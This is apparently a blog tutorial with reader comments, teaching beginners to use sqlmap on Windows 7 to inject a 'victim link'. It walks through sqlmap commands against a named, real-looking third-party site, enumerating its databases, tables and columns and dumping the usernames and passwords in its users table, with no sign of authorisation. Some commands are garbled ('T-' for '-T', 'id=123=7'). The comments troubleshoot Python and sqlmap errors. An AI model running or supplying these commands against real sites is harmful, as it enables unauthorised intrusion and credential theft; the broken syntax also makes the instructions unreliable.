Hello Im Eagle Eye
Today im gonna teach you about sqlmap on windows 7
-----------------------------------------------------------------------------------------------------------
What do you need?
[python download for windows]
[Sqlmap windows]
First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]
extract the file in Drive C
-----------------------------------------------------------------------------------------------------------
After that open your Command Promp (CMD)
Type cd\
And then press ENTER
Type cd sqlmap\
And Enter
Copy your victim link
And type to cmd like this
sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs
Replace http://yoursite.com/index.php?id=123 to your link target
Enter!
-----------------------------------------------------------------------------------------------------------
The injected site will show the Database
My testing site http://ditto3d.com/gallery.php?id=7
Example Database Shown Is : ditto3d
information_schema
If you want choose any database
you must do like shown above
sqlmap.py -u http://yoursite.com/index.php?id=123=7 -D databasename
-----------------------------------------------------------------------------------------------------------
-D (for Database)
databasename for example i put 'ditto3d' for get the table
So my site will like this
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d --tables
For your site
--> sqlmap.py -u http://yoursite.com/index.php?id=123 -D your database --tables
Press Enter!
you will get a lot of tables
such as
[ users ]
[ category ]
[ links ]
from the tables , choose one of your target to get Username and Password
then your code in cmd will be like this
sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database -T your target tables
My code in cmd will shown like
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users
-----------------------------------------------------------------------------------------------------------
Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this
sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database T- your target tables --columns
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users --columns
-----------------------------------------------------------------------------------------------------------
The tables will show the columns
such as users contain :
[ email ]
[ id ]
[ name ]
[ username ]
[ password ]
what you must to do is
adding -C username --dump behind
example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users -C username --dump
Yes you get it
Username is : blablabla
then do the same thing , but this to get 'password'
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users -C password --dump
The password is : blablabla
-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
'' -- '' this string must be a one
such as like this
from database
--> after injected
--> the database are showed
the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word
-T / -C
( --dump ) do not change this string
After the big word such as -D
You must give one space
---> -D database
-----------------------------------------------------------------------------------------------------------
THE END !
ReplyDeleteFile "sqlmap.py", line 92
except exceptionsTuple, e:
^
SyntaxError: invalid syntax
what the solution for this?
What is your python version it will ok 2.7
DeleteI too have experienced the same thing in windows 7. after downgrade python to version 2.7.5 everything running well..
Deletedont use any other version of python except 2.7.That will solve the prob
DeleteYou have to add the word python before the link.. Surely it works... Enjoy Guys...
ReplyDeleteEg: python sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs
Nice tutorial sir.
ReplyDeletewhen i run file"sqlmap.py" i got a command message
ReplyDeleteUsage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
Press Enter to continue...
But when i press Enter the sqlmap.py promt command will close down...
PLS I NEED HELP
This comment has been removed by the author.
ReplyDeleteDownload and Install Python 2.7
ReplyDeleteDownload and Extract sqlmap latest version
Now Create a new shortcut of Cmd on Desktop,right click on it and go to "property" where you will see "start in"
Now Change the directory in "start in" to where you extracted sqlmap and press ok
eg: "Start In" C:\Users\user\Desktop\sqlmap
Now Run the Cmd.exe Shortcut That You Created On Desktop, you can rename the Cmd.exe to anything.exe,bitch.exe,kiss.exe
Now The Instalation and setup of sqlmap on Windows 7 is complete.
Its Showing [18:11:13] [CRITICAL] option '-d' is incompatible with option '-u' ('--url') pls help
ReplyDelete